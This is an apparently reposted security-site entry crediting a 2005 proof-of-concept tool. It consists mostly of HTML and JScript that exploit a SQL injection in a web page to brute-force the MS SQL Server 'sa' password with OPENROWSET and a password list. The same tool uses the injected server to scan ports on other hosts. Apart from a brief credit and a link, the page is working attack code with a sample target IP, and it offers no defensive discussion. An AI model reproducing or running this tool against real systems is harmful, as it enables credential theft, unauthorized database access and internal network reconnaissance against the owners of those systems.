‘MS SQL Server Passwords Bruteforce via SQL Injection (PoC)’

Summary

Credit:

‘The information has been provided by offtopic.
The original article can be found at: http://www.securitylab.ru/_tools/2005/05/sqlbrut.zip


Details

‘Base on the article linked in our previous article: Manipulating Microsoft SQL Server Using SQL Injection, the following tool will utilize SQL injection vulnerabilities to brute force MS SQL’s sa password.

Tool:
< html>
< h3>
MS SQL Server passwords bruteforce PoC via SQL Injection
< /h3>
(c)oded by Sergey V. Gordeychik 2005< br>
< a href=mailto: offtopic@mail.ru>offtopic@mail.ru< /a>
< hr>
< table>
< tr>
< td>
URL with injection:
< /td>
< td>
< input type=text Value=’http://200.4.4.106/inject.asp?id=1;< ***>’ id=baseurl>
< /td>
< tr>
< td>
Passwords file:
< /td>
< td>
< input type=text Value=’passwords.txt’ id=passwords>
< /td>
< /table>
< input type=button Value=’Start’ onclick=’brut();’>
< hr>
< h3>
Network port scanner via SQL Injection
< /h3>
< hr>
< table>
< tr>
< td>
Server:
< /td>
< td>
< input type=text Value=’200.4.4.6′ id=server>
< tr>
< td>
Port to scan:
< /td>
< td>
< input type=text Value=’445′ id=port>
< /table>
< input type=button Value=’Check’ onclick=’scan();’>
< hr>
< a id=’status’>< /a>

< script language=’JScript’>

 var xmlhttp = new ActiveXObject(‘Msxml2.XMLHTTP’);
 var inject = ‘select * from openrowset(‘SQLOLEDB’,’.’;’sa’;’pass’,’select 1′)’

  function scan()
  {

    var x,s = inject.replace(‘.’, document.getElementById(‘server’).value + ‘,’ + document.getElementById(‘port’).value);
    s = document.getElementById(‘baseurl’).value.replace(‘< ***>’, s);
    xmlhttp.Open(‘GET’, s, false);
    xmlhttp.Send();
    x = xmlhttp.responseText;
    if (x.indexOf(‘SQL Server does not exist’)>=1) s=’closed’; else
    if (x.indexOf(‘Timeout expired’)>=1) s=’filtered or unreachable’; else
    if (x.indexOf(‘Login failed’)>=1) s=’SQL Server detected.’; else s=’open’;
    document.getElementById(‘status’).innerHTML=’Scaned ‘ + document.getElementById(‘server’).value + ‘:’ + document.getElementById(‘port’).value + ‘.Port status:< b>’+s;

  }

  function checkpass(url, passwd)
  {
    var s = inject.replace(‘pass’, passwd);
    s = url.replace(‘< ***>’, s);
    xmlhttp.Open(‘GET’, s, false);
    xmlhttp.Send();
    if (xmlhttp.responseText.indexOf(‘Login failed’)>=1) return 0; else
    {
    return 1;
    }
  }
  
  function brut()
  {
   document.getElementById(‘status’).innerHTML=’Starting…’;
   var fso, f, pass, baseurl, passwords, i
   fso = new ActiveXObject(‘Scripting.FileSystemObject’);
   baseurl=document.getElementById(‘baseurl’).value;
   passwords=document.getElementById(‘passwords’).value;
   f = fso.OpenTextFile(passwords, 1);
   i = 0;
   while (!f.AtEndOfStream)
   {
    pass = f.ReadLine();
    i=i+1;
    if (!(i % 10))
    {
       document.getElementById(‘status’).innerHTML=’Trying password N’+i+’ < b>’+pass+'< /b>’;
    }
    if (checkpass(baseurl, pass))
    {
      document.getElementById(‘status’).innerHTML=’SA password is ‘< b>’+pass+'< /b>’. Checked ‘+i+’ passwords’;
      return 0;
    };
   }
   document.getElementById(‘status’).innerHTML=’Ooopssss…. May be next time’;
  }
< /script>’

Categories: Tools